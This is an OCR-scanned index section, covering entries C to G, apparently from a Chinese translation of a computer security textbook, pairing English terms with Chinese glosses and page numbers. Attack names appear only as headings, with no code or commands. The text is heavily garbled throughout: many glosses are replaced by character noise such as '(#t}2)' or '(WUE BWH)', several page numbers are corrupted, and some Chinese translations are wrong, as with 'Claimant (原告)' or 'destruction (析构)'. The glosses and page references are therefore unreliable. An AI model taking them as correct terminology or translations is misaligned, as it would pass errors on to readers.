Cardinality，RBAC roles (RBAC 角色 基数 )，126 
Cascaded access right (级 联 访问 权限 )，164 
Cascading authorizations (级 联 授权 )，163-164 


Centralized administration (集中 管理 ， 中 央 管 理 )，161 
CERT, JL Computer Emergency Response Team 
Certificate authority (CA， 证 书 管理 中 心 )，52，301， 
405, 691, 694 
Certificate revocation list (CRL， 证 书 撤销 列表 )，693 
Certificates (证 书 ) 
attribute (属性 )，693 
conventional (long-lived) (习惯 ,长 期 的 习俗 ) 693 
proxy (代理 )，693 
public-key (2548), 52-53 
short-lived (短期 )，693 
X.509, 53 
Certification (AHE), 16 
cross (26%), 696 
service (服务 )，664 
Challenge-response protocol (挑战 -应 答 协 议 ),，93-94， 
96-97, 102 
Change Cipher Spec Protocol (变更 密码 标准 协议 )，670 
Change management (变更 管理 )，501 
Channel (信道 ， 通 道 )，23-24，560，587，620，701 
Charge-coupled device (CCD, BEHRA E), 57 
Chernobyl virus (〈 切 尔 诺 贝 利 病毒 )，205 
Choreographic works, copyrighted (舞蹈 作品 ， 版 
权 )，584 
Chroot jail (Chroot 监牢 )，384，410-411 
Chroot system (Chroot 系统 )，410 
chroot system function (chroot RC PAA), 384 
CHUID digital signature (CHUID 数字 签名 )，522-523 
CIAtriad (CIA 组 )，3 
Cipher block chaining (CBC) mode (密码 分 组 链接 
模式 ， 密 码 块 链接 模式 )，623-625 
Cipher feedback (CFB) mode (密码 反馈 模式 )， 
625-626 
Cipher suite (密码 套件 )，671 
Ciphertext (X), 32, 46, 606, 607 
public-key encryption ( 公 钥 加 密 )，46 
symmetric encryption (对 称 加 密 )，32 
Ciphertext-only attacks ( 唯 密 文 攻击 )，607-608 
Circuit-level gateway/circuit-level proxy (电路 级 网 
关 / 电 路 级 代理 )，297-298 
CIRT, JL Computer incident response team 
Claimant (原告 )，66 
Class (28), 110, 120, 127, 253, 347, 351, 364, 
369, 492, 592-593 


Clearinghouse (票据 交换 所 )，587 
Clear-signed data (明确 签署 的 数据 )，662 
Clickjacking (点 击 劫持 )，202 
Client (客户 端 )，170 
Client attacks (客户 端 攻 击 )，96-97 
Cloud auditor ( 云 审计 者 )，430，431 
Cloud broker ( 云 经 纪 人 )，430，431 
Cloud carrier ( 云 运 营 者 )，430，431 
Cloud computing ( 云 计算 ) 
abuse and nefarious (滥用 和 恶意 )，436 
addressing security concerns (解决 安全 问题 )， 
434-435 
cloud deployment models ( 云 部 署 模型 )，427-429 
cloud security service ( 云 安全 服务 )，438-442 
cloud service models ( 云 服务 模型 )，426-427 
data protection in (数据 保护 )，437-438 
elements (元 素 ， 要 素 )，424-426 
infrastructure as a service (JaaS ， 基 础 设施 即 服务 )， 
426-427 
interactions between actors (因素 之 间 的 相互 作 
用 )，432 
open-source security module (开源 安全 模块 )， 
442-443 
platform as a service (PaaS ， 平 台 即 服务 )，429-432 
reference architecture (参考 架构 )，426 
risks and countermeasures ( 风险 和 对 策 )，435-437 
security approaches for (安全 方法 )，438 
security issues for (安全 问题 )，432-434 
software as a service (SaaS ， 软 件 即 服务 )，426 
Cloud context and IoT ( 云 环 境 和 物 联网 ) 
backbone network ( 主干 网 络 )，447 
cloud ( 云 )，447-448 
core (核心 )，447 
edge (边缘 )，445-446 
fog (35), 446-447 
Cloud deployment models ( 云 部 署 模型 ) 
community cloud (社区 云 )，428-429 
comparison of ( 比较)，429 
hybrid cloud (混合 云 )，429 
private cloud (Az), 428 
public cloud (公有 云 ), 427-428 
Cloud network ( 云 网 络 )，447-448 
Cloud security alliance ( 云 安全 联盟 )，436-467 
Cloud service consumers (CSC, RSF ), 425- 
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426, 430, 438 

Cloud service models( 云 服务 模型 )，426-427 

Cloud service provider (CSP， 云 服务 提供 者 )，430， 
438 

Clustering and outlier detection ( 聚 类 和 蜡 类 检测 ), 
201 

Code analysis techniques (代码 分 析 技 术 )，161 

Code injection attack (代码 注 入 攻击 )，367-368，383 

Code of Practice for Information Security Management 
(ISO 27002) (信息 安全 管理 实施 细则 )，516， 
529, 554, 592-593 

Code Red II (红色 代码 I1), 198 

Codes of conduct (47 AHEM), 598 

Code, writing safe programs using (和 准则， 编写 安全 
程序 )，373-378 

Collision resistance ( 抗 碰撞 性 )，43-44 

Collision resistant hash functions (chlo PARL), 43 

Combined approach, security risk assessment (组 合 
方法 ， 安 全 风险 评估 )，468 

Command-and-control(C&C) server network (命令 和 
控制 服务 器 网 络 )，208 

Command injection attack (命令 注入 攻击 )，366，392 

Common controls (和 常见 的 控制 )，496 

Common Criteria (CC， 通 用 标准 )，551-553,，572，593 

assurance level (保险 级 别 )，376 

Communication lines, computer security and (通信 线 
路 ,计算 机 安全 )，12 

Communications channel (CC， 通 信和 通道 )，23 

Communication security (通信 安全 )，450 

Communications facilities and networks (通信 设施 和 
网 络 )，7 

Community cloud (社区 云 )，428-429 

Comm Warrior worm (Comm Warrior 蠕虫 )，201 

Companion key (伴随 密 钥 )，46 

Company policy (公司 策略 )，539 

Company rights (公司 权利 )，539 

Compile-time defenses (编译 时 防御 )，342-346 

Complete mediation (完全 仲裁 )，18 

Complex password policy (复杂 口令 策略 )，79 

Compression function (压缩 函数 )，643 

Compression method (压缩 方法 )，671 

Compromise (妥协 )，71，484 

Computationally secure (计算 安全 )，608 

Computer crime (计算 机 犯罪 )， 参 见 Cybercrime 
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Computer Emergency Response Team ( CERT， 计 算 
机 应 急 响应 小 组 )，22，320 
Computer-generated passwords (计算 机 生成 的 口令 )，79 
Computer incident response team ( CIRT， 计 算 机 突 
发 事件 响应 小 组 )，541 
Computer room (计算 机 室 )，176 
Computers (计算 机 ) 
as‘storage devices (作为 存储 设备 )，580 
as targets (作为 目标 )，579 
Computer security (计算 机 安全 ) 
availability (可 用 性 )，6 
breach of levels (违背 的 层次 )，4 
categories of vulnerabilities (漏洞 分 类 )，7 
challenges of (挑战 )，6-7 
as communications tools (作为 通信 工具 )，580 
confidentiality (机 密 性 )，5 
consumers of services and mechanisms (服务 和 机 
制 的 用 户 )，26 
cost of security failure (安全 失效 的 代价 )，25 
definition (定义 )，2-6 
ease of use vs. security ( 易 用 性 与 安全 )，25 
functional requirements (功能 需求 )，15-17 
fundamental security design principles (基本 安全 
设计 原则 )，17-21 
high level (高 层次 )，5 
implementation of (实现 )，25-26 
integrity (完整 性 )，5-6 
key objectives (关键 目标 )，3 
low level (低层 次 )，4 
model for (模型 )，7-9 
moderate level (中 等 层次 )，5 
policy (策略 )，24-25 
privacy (隐私 )，589-595 
privacy and (隐私 )，3，5，13，139，579,，586，589-595 
scope of ( 域 )，12 
strategy (R), 24-26 
system resources (assets) (系统 资源 )，7，11-13 
teaching webcasts for (教学 网 络 广播 )，738 
terminology (术语 )，7 
threats to (威胁 )，9-15 
Computer security incident response team ( CSIRT, 
计算 机 安全 事件 响应 团队 )，539-546 
detecting incidents (检测 事件 )，541-542 
documenting incidents ( 规 档 记 录 事 件 )，545 


information flow for incident handling (事件 处 理 
信息 流 )，545-546 
responding to incidents( 啊 应 事件 )，543-544 
triage function (分 类 功能 ， 分 流 功 能 )，542 
Computing artifact (计算 机 产品 )，601 
Conficker (or Downadup) worm ( Conficker ( 或 
Downadup) 蠕虫 )，199 
Confidence (机 密 )，521 
Confidentiality (机 密 性 )，$，13，101，454，669 
computer security and (计算 机 安全 )，3，5，13 
data (数据 )，3 
Family Education Rights and Privacy Act (FERPA, 
家 庭 教育 权利 及 隐私 法 )，5 
message or data authentication without (消息 或 数 
据 认 证 )，38 
public-key encryption ( 公 钥 加 密 )，46-47 
symmetric encryption and (对称 加 密 )，31-37 
threat to (jai), 9 
Configuration management (MEB), 12, 
18, 290, 492, 494-495, 499-502, 571 
Consent (同意 )，595 
Consequence (结果 )，9-1]，13, 45, 226, 234, 242, 
248, 320, 321, 337, 359, 361, 364, 367, 
371-372, 374, 377-378, 382-384, 392, 405, 
407, 414, 459, 463, 467, 472-474, 476-478, 
480, 482-485, 496, 501, 599, 615 
Constant exponentiation time (不 变 的 过 运算 时 间 )，652 
Constituency (R, MZ), 541 
Consumers (消费 者 )，587，588 
Container virtualization ( 容 融 虚拟 化 )，417 
Content management (内 容 管 理 )，588 
Content ownership (内 容 拥 有 者 )，538 
Content provider (内 容 提 供 者 )，587 
Content-Type HTTP response header (内 容 类 型 HTTP 
响应 头 )，393 
Contingency planning (意外 事故 规划 )，16 
Continuum learning (持续 性 学 习 )，530-531 
Contractual obligations (合同 义务 )，530 
Control (控制 ) 3, 17, 38, 66, 76, 86, 98, 151, 
158; 190, 208, 215, 217, 228, 235-236, 
257, 304, 320, 324-326, 329-330, 339, 342, 
346-348, 353, 370-371, 375, 378, 380, 384, 
386, 388, 392-393, 399, 403-404, 406-407, 
465, 470-471, 480-481, 483, 489-497, 579 
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Conventional (long-lived) certificates (传统 (长 效 ) 
证 书 )，693 
Cookies，138 
Copying of biometric parameter (生物 特征 参数 拷 
贝 )，97 
Copyright law (版 权 法 )，$84 
Copyrights, intellectual property and (版 权 ， 知 识 产 
权 )，583 
Core network (核心 网 络 )，447，452 
Corporate physical security policy (公司 物理 安全 政 
策 )，519-520 
Corporate security (公司 安全 )，299，463 
Correlation (关联 )，574 
Corrupted system (427K AS, WAZ), 7 
Corruption (损坏 ， 腐 败 )， 10-11, 184, 186, 205-206, 
321, 324, 343, 353, 377, 383, 407, 482 
Cost of security failure (安全 失效 的 代价 )，25 
Countermeasures (对 策 )，8，9，489-497 
attack strategies and (攻击 策略 )，70-71 
buffer overflow (缓冲 区 溢出 )，342-346 
compile-time defenses (编译 时 防御 )，342-346 
denial-of-service (DoS) attacks (拒绝 服务 攻击 )， 
243-247 
distributed intelligence gathering (分 布 式 情报 搜 
集 )，220 
flooding attacks ( 洪 泛 攻击 )，247 
heap overflows (Svar tt) ), 350 
host-based behavior-blocking software (基于 主机 
的 行为 阻 断 软件 )，218 
host-based scanners (基于 主机 的 扫描 右 )，216-219 
for malware (恶意 代码 )，214-216 
perimeter scanning (边界 扫 摘 )，219-220 
rootkit，219 
run-time defenses (运行 时 防御 )，346-348 
safe coding techniques (安全 编码 技术 )，343-345 
safe libraries (安全 库 )，345 
spyware detection and removal (间谍 软件 检测 和 
移 除 )，218 
of SQLi attacks (SQLi 攻击 )，161 
stack protection mechanisms (堆栈 保护 机 制 )， 
345-364 
Counter (CTR) mode (计数 天 模式 )，626-628 
Counter mode-CBC MAC Protocol ( CCMP ， 计 数 器 
模式 密码 块 链 消息 完整 码 协议 )，727 
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Covert channel analysis (隐蔽 8 通道 分 析 )，495 
C programming language (C 编程 语言 )，325 
CPU emulator (CPU 仿真 器 )，217 
Credential management (证 书 管理 )，134-125 
Credentials (证 书 )，65 
Credential service provider (CSP, 证 书 服务 提供 
#4), 65 
Credential theft (WUE BWH), 209 
Crimeware (犯罪 软件 )，186，209 
CRL issuer (CRL 发 行人 )，696 
Cross certification (交叉 证 明 )，696 
Cross connects (交叉 连接 )，174 
Cross-site scripting attacks ( XSS， 跨 站 脚本 攻击 )， 
369-370 
Cryptanalysis (密码 分 析 )，3233，35,，4，45，607-609 
Cryptanalytic attacks (密码 分 析 攻 击 )，72 
Cryptographic algorithms (密码 算法 )，455 
Cryptographic message authentication code (密码 学 
消息 认证 码 )，111 
Cryptographic tools (密码 学 工具 ) 
asymmetric encryption algorithms ( 非 对 称 加 密 算 
法 )，49-50 
confidentiality (机 密 性 )，31-37 
digital envelopes (数字 信封 )，54-55 
digital signatures (数字 签名 )，50-54 
encryption of stored data (存储 数据 加 窗 )，57-58 
hash functions( 散 列 函 数 )，40-45 
key management ( 密 钥 管理 )，38-40 
message authentication (消息 认证 )，38-40 
Pretty Good Privacy (PGP， 良 好 隐私 )，58 
pseudorandom numbers( 伪 随机 数 )，55-57 
public-key encryption( 公 钥 加 密 )，45-54 
random number (随机 数 )，56-57 
symmetric encryption (对 称 加 密 )，31-33 
Cryptography (密码 学 )，607， 参 见 Public-key 
encryption/cryptosystem; Symmetric encryption 
CSI/FBI 计算 机 犯罪 和 安全 调查 (CSI/FBI Computer 
Crime and Security Survey), 473 
CWE/SANS 前 25 个 最 严重 的 软件 错误 (CWE/SANS 
Top 25 Most Dangerous Software Errors list), 359 
Cybercrime (M2472 4F), 579-580 
cited in the convention on cybercrime (网 络 犯 罪 大 
会 引用 的 )，581 
law enforcement challenges (法 律 执行 挑战 )，580- 
582 
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types (%41), 579-580 
Cybercrime victims (网 络 犯罪 受害 者 )，582 
Cyber criminals (网 络 罪犯 )，252-253，581 
Cyber-espionage worm (网 络 间谍 蠕虫 )，199 
Cyberslam, DoS (Cyberslam 攻击 )，228 
D 
DAC, J Discretionary access control 
Data (数据 )，7，13 
backup (备份 )，407 
confidentiality (机 密 性 )，3，579 
correct interpretation of (正确 的 解释 )，376-377 
destruction ( 析 构 )，205-206 
functions ( pKi3X), 551 
generation (产生 )，551-552 
integrity (完整 性 ), 3, 11, 13, 26, 37, 43, 46 
47, 52, 101, 265, 579, 635-636 
leakage or loss (泄漏 或 丢失 )，437 
owner (拥有 者 )，169 
personal (个 人 的 )，84 
sharing (47), 595 
source (W), 277 
surveillance and privacy (监督 和 隐私 )，593-595 
swapping (交换 )，621 
values, writing correct code for ( 值 ， 写 纠 错 码 )， 
376-378 
Data authentication (数据 认证 )，454 
Database access control (数据 库 访问 控制 )，161-166 
cascading authorizations (级 联 认证 )，163-164 
fixed database roles (固定 的 数据 库 角 色 )，165 
fixed server roles (固定 的 服务 器 角色 )，165 
range of administrative policies (管理 策略 范围 ) 161 
role-based (基于 角色 的 )，164-166 
SQL-based (基于 SQL 的 )，162-163 
user-defined roles (用 户 定义 的 角色 )，165 
Database encryption (数据 库 加 密 )，169-172 
disadvantages to (劣势 )，169 
entities (实体 )，169 
Database management system (DBMS ， 数 据 库 管理 
系统 )，149-151，168 
Database RBAC facility (数据 库 RBAC 设施 )，164 
Databases (数据 库 )，149，586 
encryption (加 密 )，169-172 
inference and (推理 )，166-168 
query language (查询 语言 )，150 


relational (相关 的 )，151-155 
security, need for (安全 性 ， 需 要 )，148-149 
statistical (统计 的 )，586 
storage for logs (日 志 存 储 )，563 
Data center/cloud (数据 中 心 / 云 )，452 
Data center security (数据 中 心安 全 )，172-177 
considerations (注意 事项 )，174-175 
elements (成 分 )，173-174 
TIA-492, 175-177 
Data confidentiality (数据 机 密 性 )，727 
Data definition language (DDL， 数 据 定 义 语 言 )，150 
Data Encryption Algorithm (DEA， 数 据 加 密 算 法 )， 
33, 611 
Data Encryption Standard (DES, Hi jill 8 tr HE), 
31, 611-612, 686 
Data exfiltration (数据 渗 出 )，211 
Data loss prevention (DLP， 数 据 损失 防范 )，441 
Data management security (数据 管理 安全 )，450 
Data manipulation language ( DML， 数 据 操 纵 语 
言 )，150 
architecture (架构 )，150 
Data protection and confidentiality (数据 保护 和 机 密 
性 )，453 
Data protection in cloud computing ( 云 计算 中 的 数据 
保护 ) 
multi-instance model (多 实例 模型 )，437 
multi-tenant model (多 租户 模型 )，438 
Deadlock, prevention of ( 死 锁 ， 预 防 )，378 
Deallocator (回收 大 )，353 
Decentralized administration (分 散 管 理 )，161 
Deception (欺骗)，11 
Decryption (解密 )，34，35，37，40，46，49 
Decryption algorithm (解密 算法 )，32，46-47，606， 
613, 615, 625, 628, 650, 652 
public-key encryption 〈( 公 钥 加密 )，46 
symmetric encryption (对 称 加 密 )，32 
Defense in depth (深度 防御 )，20 
Defensive coding (防御 性 编码 )，160 
Defensive programming (防御 性 程序 设计 )，358-362 
Deletion, access to (删除 ， 访问 )，110 
Denial-of-service (DoS， 拒 绝 服务 )，14，703 
Denial-of-service (DoS) attack (拒绝 服务 攻击 )，21， 
97, 156, 226-228, 272 
amplification (KK), 235, 239, 242-243 


classic (经 典 的 )，228 
countermeasures (对 策 )，238，243-247 
distributed (分 布 式 )，207，234-236 
flooding ( 洪 泛 )，233-234 
reflection (反射 )，239-242 
responding to (Miz), 247-248 
smurf DoS program (Smurf DoS 程序 )，242 
source address spoofing( 源 地 址 欺骗 )，229-230 
SQLi attack and (SQLi 攻击 )，156 
SYN spoofing attack (SYN 欺骗 攻击 )，230-233 
Tribe Flood Network (TFEN， 部 落 洪 泛 网 络 )，235 
DES, ÅJ Data Encryption Standard 
3DES, AJ Triple DES 
Design patents (设计 专利 )，585 
Destructor functions( 析 构 函 数 , 析 构 功能 )，353 
Detailed security risk analysis (详细 安全 风险 分 析 )， 
467-468 
analysis of risks (风险 分 析 )，474-478 
context or system characterization (环境 或 系统 特 
征 )，470-471 
evaluation of risks (风险 评估 )，478 
identification of threats / risks / vulnerabilities ( 威 
胁 / 风险 / 漏洞 识别 )，472-474 
risk treatment (KUARE), 479-480 
Silver Star Mines, risk assessment process (ÆW 
业 风 险 评估 过 程 )，480-485，502-505 
Detecting an attack (检测 攻击 )，9 
Detection (检测 )，25-26 
methods (方法 )，160 
and recovery control (恢复 控制 )，491 
Deterrence (威慑 )，473 
Developers (开发 者 )，534 
Diffie-Hellman key exchange/key agreement ( Diffie- 
Hellman 密 钥 交换 / 密 钥 协议 )，49，54，652-657 
Digital content (数字 内 容 )，586 
Digital envelopes (数字 信封 )，54-55 
Digital identity (数字 识别 )，134 
Digital immune system (数字 免疫 系统 )，308-309 
Digital Millennium Copyright Act (DMCA, F F 
年 版 权 法 案 )，586-587 
Digital Rights Management (DRM， 数 字 权 利 管理 )， 
587-589 
architecture (444), 589 
billing/payments (账单 /支付 )，589 
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components (4H/4), 588 
Digital Signature Algorithm (DSA， 数 字 签 名 算法 )， 
49, 657 
Digital signatures (数字 签名 )，50-55 
Digital Signature Standard (DSS， 数 字 签 名 标准 )， 
49, 656-657 
Digital user authentication (数字 用 户 认 证 ) 
means of (手段 )，66-67 
model for (模型 )，65-66 
risk assessment (风险 评估 )，67-70 
Directed broadcast (直接 广播 ),，242，246 
Directory information (目录 信息 )，5 
Directory service access (目录 服务 访问 )，561 
Directory traversal ( A sei ), 307 
Disciplinary action 〈 纪 律 处 分 )，539 
Disclosure (揭露 )，3，9-13，20，28-29，68，167， 
483，494，600 
Discretionary access control (DAC， 目 主 访问 控 
制 )，109-117 
access matrix controller (ila) Aa MeFi at), 114 
access rights of subjects (主体 访问 权限 )，114 
of devices (427%), 113 
general model (通用 模型 )，112-116 
logical or functional point of view (逻辑 或 功能 观 
察 点 )，113 
ofmemory locations orregions (内 存 位 置 或 区 域 )，113 
of processes (ARIE), 113 
protection domains (保护 域 )，116-117 
转 授 ， 授 权 和 删除 访问 权限 的 规则 (rules for 
transferring, granting, and deleting access 
rights), 114 
display() function (display() 函数 )，332 
Dispute resolvers (争端 调解 者 )，139 
Disruption (WEA), 10-11, 14-15, 21, 188, 195, 
225, 382 
Distributed denial-of-service (DDoS) attacks (分 布 式 
拒绝 服务 攻击 )，207，234-236 
Distributed detection and inference (DDI) events (分 
布 式 检测 和 推断 事件 )，275 
Distributed firewalls〈 分 布 式 防火 墙 )，304-306 
Distributed host-based intrusion detection (分 布 式 基 
于 主机 的 入 侵 检 测 )，252 
Distributed intrusion prevention system (IPS， 分 布 式 
人 侵 防御 系统 )，220，265-267 
architecture for (架构 )，266 
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central manager module (集中 管理 模块 ， 中 央 管 
理 模块 )，266 
host agent module (主机 代理 模块 )，266 
LAN monitor agent module (局 域 网 监控 代理 模 
块 )，266 
major issues in the design of (设计 中 的 主要 问题 )， 
265-266 
Distributed or hybrid IDS (分 布 式 或 混合 式 IDS), 
287， 志 5 
Distribution right (发 行 权 )，584 
Distribution system (DS， 分 布 式 系统 )，711 
messages distribution of (消息 分 发 )，713 
Distributor (发 行人 ， 分 配 者 )，587 
DMZ (demilitarized zone) ( 非 军 事 区 )，279 
networks (网 络 )，301-303 
DNS amplification attacks (DNS 放大 攻击 )，243 
Domain keys identified mail ( DKIM， 域 名 密 钥 识 别 
邮件 )，664-668 
internet mail architecture (Internet 邮件 体系 结构 )， 
665-666 
strategy (策略 )，666-668 
Domain name system (DNS， 域 名 系统 )，666 
Dormant phase of virus (病毒 休眠 期 )，189 
DoS, JL Denial-of-service 
Double bastion inline ( 双 保 垒 内 联 )，306 
Double bastion T (XE T), 306 
Downloaders ( F4k#), 185 
Dramatic works, copyrighted (戏剧 作品 ,有 版 权 的 )， 
584 
Drive-by-download attack ( 夹 市 式 下 载 攻 击 )，186， 
188, 201-202 
Drone, 207 
Drop ( FRÆ), 309 
Duqu worm (Duqu $H), 199 
Dynamically linked shared libraries (动态 链接 共享 
FE), 566 
Dynamic binary rewriting (动态 二 进 制 重 写 )，569-570 
Dynamic biometric authentication (动态 生物 特征 认 
证 )，87-92 
Dynamic biometric protocol (动态 生物 特征 协议 )，95 
Dynamic Host Configuration Protocol ( DHCP， 动 态 
主机 配置 协议 )，271 
Dynamic Link Libraries (DLLs， 动 态 链 接 库 )，263 
E 
EAP exchange (EAP 交换 )，721-722 


EAPOL Key Encryption Key ( EAPOL-KEK, EAPOL 
密 钥 加 密 密 钥 )，725 
EAP Over LAN(EAPOL)Key Confirmation Key(EAPOL- 
KCK) (EAPOL-KCK， 基 于 局 域 网 的 扩展 认证 协 
IX (EAPOL) 密 钥 认证 密 钥 )，725 
Earthquake (地 震 )，511 
Eavesdropping (jf), 96-97 
Economy of mechanism (经 济 机 制 )，18 
Edge network (边缘 网 络 )，445-446 
Egress monitors (出 口 监控 )，219-220 
Electrically erasable programmable ROM (EEPROM, 
电子 可 控 除 编程 ROM), 84 
Electromagnetic interference (EMI) threat (电磁 干扰 
威胁 )，515 
Electronic codebook(ECB)mode (电子 密码 本 模式 )， 
35, 37, 623, 644 
Electronic identity (eID) card (电子 身份 证 )，85-87 
functions (JHE, PKA), 86-87 
human-readable data on (人 类 可 读 的 数据 )，84 
Password Authenticated Connection Establishment 
(PACE, 口令 认证 连接 建立 )，87 
Electronic monitoring (电子 监控 )，71 
Elliptic curve cryptography (ECC， 椭 圆 曲 线 密 码 
学 )，49-50，657 
E-mail (电子 邮件 )，538-539 
attachment, infected (附件 感染 )，198，203 
Secure/Multipurpose Internet Mail Extension (S/ 
MIME， 安 全 /多 用 途 Internet 邮件 扩展 )，53， 
661-664, 692 
security (安全 性 )，441 
spam (垃圾 邮件 )，203 
Trojan horses (木马 )，203-204 
unlawful activity prohibited (禁止 非法 活动 )，539 
Employee behavior (员工 行为 )，529 
Employees security policy (员工 安全 策略 )，539 
Employment agreements (雇用 协议 )，536 
Employment practices and policies 雇 用 实践 和 策略 )， 
535-538 
Emulation control module (仿真 控制 模块 )，217 
Encapsulating Security Payload (ESP， 封 装 安 全 载 集 ) 
information (信息 )，679 
transport mode (传输 模式 )，680-681 
tunnel mode (隧道 模式 )，681 
Encapsulation (封装 )，20 


Encrypted virus (加 密 的 病毒 )，193 
Encrypting File System (EFS， 加 密 文 件 系统 )，413 
Encryption (加 密 )，441，703 
end-to-end (iE), 628 
research (WR), 586 
of stored data, application of (存储 的 数据 ， 应 用 
程序 )，57-58 
Encryption algorithm (WERI), AI Asymmetric 
encryption algorithms, Symmetric encryption 
End entity (终端 实体 )，696 
End-of-line comment ( 行 尾 注释 )，159 
End-to-end encryption ( 端 到 端 加 密 )，628 
End user (终端 用 户 )，164 
Enroll (注册 )，89-90，98 
Enterprise cloud computing (企业 云 计 算 )，424 
Enterprise identity (企业 级 一 致 性 )，134 
Enterprise resource planning ( ERP， 企 业 资 源 规 
划 )，432 
Enterprise-wide access control (企业 级 访问 控制 )，135 
Entrance room ( 接 入 室 )，176 
Enveloped data, S/MIME (封装 数据 )，662 
Environmental threats (环境 威胁 ) 
chemical, radiological, and biological hazards (化 
学 、 放 射 性 和 生物 危害 )，514 
dust (灰尘 )，514 
fire and smoke (KAIKA), 512-513 
inappropriate temperature and humidity (不 合适 的 
温度 和 湿度 )，511-512 
infestation ( 侵 染 ， 感 染 )，515 
water damage (水 损害 )，513-514 
Environmental variables, software security (环境 变 
量 ， 软 件 安 全 )，379-382 
Environment attributes (环境 属性 )，127 
ePass function (ePass 因数 )，8$，86 
Equipment distribution area (EDA， 设 备 分 布 区 )，177 
Error-detection code ( 纠 错 码 )，37 
eSign function (eSign PŽ), 85 
Espionage (JH), 210-211 
/ete/syslog.conf, 562 
Ethics (伦理 ) 
codes of conduct (行为 准则 )，598 
IEEE Code of Ethics (IEEE 伦理 准则 )，600 
Information Technology professions (信息 技术 专 
业 )，596 
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issues related to computers and information systems 
(有 关 计 算 机 和 信息 系统 的 议题 )，596-598 
rules (规则 )，601 
European Union Data Protection Directive (欧盟 数据 
保护 指令 )，590 
Evaluation (评估 )，26，35，465，468，475，489 
Event and audit trail analysis software, tools, and 
interfaces (事件 和 审计 人 迹 分 析 软 件 ， 工 具 和 
接口 )，554 
Event definition (事件 定义 )，552 
Event detection (事件 检测 )，554 
Event discriminator (事件 鉴别 )，550 
Event recording (事件 记录 )，554 
Event response (事件 响应 )，562-563 
Event selection (事件 选择 )，552 
Event storage (事件 存储 )，552 
Executable address space protection (可 执行 地 址 空 
间 保 护 )，346-347 
Execute access (执行 访问 )，110 
Execution phase of virus (病毒 执行 期 )，190 
viral structure (病毒 结构 )，191-192 
Executive-level training (执行 层 训 练 )，534 
execve()system function (execve() 系统 函数 )，335 
Exploits (WIFI), 188 
Exposure (48%), 9, 406, 406, 470, 474, 500, 582 
Extended service set (ESS， 扩 展 服务 集 )，712 
transition (迁移 )，714 
Extensible Markup Language ( XML ， 可 扩展 标记 语 
言 )，276 
Extreme Learning Machines (ELM， 极限 学 习 机 )，263 
F 
Facilities security (设备 安全 ， 设 施 安全 )，508 
Factoring problem for RSA algorithms ( RSA 算法 因 
数 分 解 问题 )，650-651 
Fail-safe default (安全 的 缺 省 设置 )，18 
Fair use (公平 使 用 )，586 2 
False negatives( 汤 报 )，257，260 
False positives( 误 报 )，257，260 
Falsification (伪造 )，10-11 
Family Educational Rights and Privacy Act ( FERPA, 
家 庭 教 育 权 利和 隐私 法 案 )，5 
Federal Information Processing Standards ( FIPS, H% 
HHE ARBRE), 3-4, 15, 17, 33, 35, 39, 
44, 49, 68, 79, 611, 637, 656 
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PUB 46, 33 
PUB 180, 44 
PUB 186, 49 
PUB 197, 35 
PUB 199, 3-4 
PUB 200, 15, 17 
Federated identity standards and protocols (联邦 身份 
标准 和 协议 )，132 
Feistel cipher structure (Feistel #3454 ), 606-611 
fgets() library routine (fgets() 库 行为 )，332 
File access control (文件 访问 控制 )，77-78，117-119 
File access system (文件 访问 系统 )，307 
File infector (文件 传染 者 )，192 
File integrity checksums (文件 完整 性 校 验 和 )，263 
Finger (手指 )，271 
fingerd daemon (指示 服务 守护 进程 )，326 
FIPS， 参 见 Federal Information Processing Standards 
Firewall projects (防火 墙 项 目 )，736-737 
Firewalls (防火 墙 )， 参 见 Intrusion prevention systems 
activity patterns, access based on (活动 模式 ， 访 
问 基于 )，291 
application-level gateway (应 用 级 网 关 )，297 
application protocol (应 用 层 协 议 )，291 
basing ( 打 基 础 )，298-301 
bastion host (Æ EHL), 298-299 
characteristics and access policy (特征 和 访问 策 
Wt), 290-291 
circuit-level gateway/circuit-level proxy (电路 级 网 
关 / 电 路 级 代理 )，297-298 
distributed (分 布 式 )，304-306 
DMZ networks ( 非 军 事 区 网 络 ，DMZ 4%), 
301-303 
host-based (基于 主机 的 )，299-300 
IP address and protocol values (IP 地 址 和 协议 值 )，290 
limitations (局 限 )，291 
location and configurations (位 置 和 配置 )，301-306 
need for (需要 )，289-290 
packet filtering ( 包 过 滤 )，293-295 
personal (个 人 )，300-301 
scope of ( 域 )，291 
stateful inspection (状态 检测 )，296-297 
types of (类 型 )，292-298 
users identity, access based on (用 户 识 别 ， 基 于 
访问 的 )，291 


virtual private networks (VPN， 虚 拟 专用 网 )，303 
First-generation scanner (第 一 代 扫 描 器 )，216 
Fixed database roles (固定 数据 库 角 色 )，165 
Fixed server roles (al AR ai ffi E), 165 
Flash crowd ( 突 发 访问 )，244 
Flood (#t}2), 511 
Flooders (DoS client) ( 洪 泛 攻击 程序 ( DoS 客户 
端 ) )，185 
Flooding attacks ( 洪 泛 攻击 )，233-234 
defenses against (防御 )，245 
ICMP flood (ICMP 洪 泛 )，233 
TCP SYN flood (TCP SYN 洪 泛 )，234 
UDP flood (UDP 洪 泛 )，233-234 
Fog computing (FiA), 447 
Fog computing devices ( 雾 计 算 设 备 )，447 
Fog/edge network (和 /边缘 网 络 )，452 
Fog network (F Rig), 446-447 
Foreign key (hE), 153, 162 
Format (#@x0), 218, 252, 265, 266, 275-277, 281, 
341, 346, 353, 359, 368, 408, 559, 563, 
575, 586, 607, 639, 685, 692-693 
Format string overflows (I FIF PREH), 353 
Forward add round key transformation (1E [i] #2 3 $H 
加 变换 )，618 
Forward mix column transformation ( 正 问 列 混淆 变 
换 )，618 
Forward shift row transformation ( 正 问 行 移 位 变换 ) 
616 
Forward substitute byte transformation (下 向 字 节 代 
换 变 换 )，616 
Fourth-generation products (第 四 代 产 品 )，217 
Fraggle program (Fraggle 程序 )，242 
FreeBSD, 74-75, 120 
FTP (文本 传输 协议 )，271，297 
Functional requirements, IT security (功能 需求 ，IT 
安全 )，15-17 
Function call mechanisms, buffer overflow (函数 调 
HALA, 缓冲 区 溢出 )，326-327 
Function returns ( pK RUKIA] ), 326 
Fuzzing (模糊 )，372-373 
Fuzzing software tests (模糊 软件 测试 )，372-373 
Fuzzy logic (模糊 逻辑 )，261 
G 
Gardner, Martin (WE, 47), 49 
Gateways (JX), 245, 297, 446 


General role hierarchy (一 般 角 色 层 次 )，145 
Genetic algorithms (遗传 算法 )，261 
getinp() function (getinp() PKŠ), 332 
gets() function (gets() PAX), 322, 326, 351 
gets() library routine (gets() 库 例 程 )，351 
Global data area overflows (4 a BCE Kith ), 353 
GNOME Programming Guidelines (GNOME 编程 
指导 )，389 
Governance and custodianship (治理 和 监护 )，5$95 
Gpcode Trojan (木马 )，205 
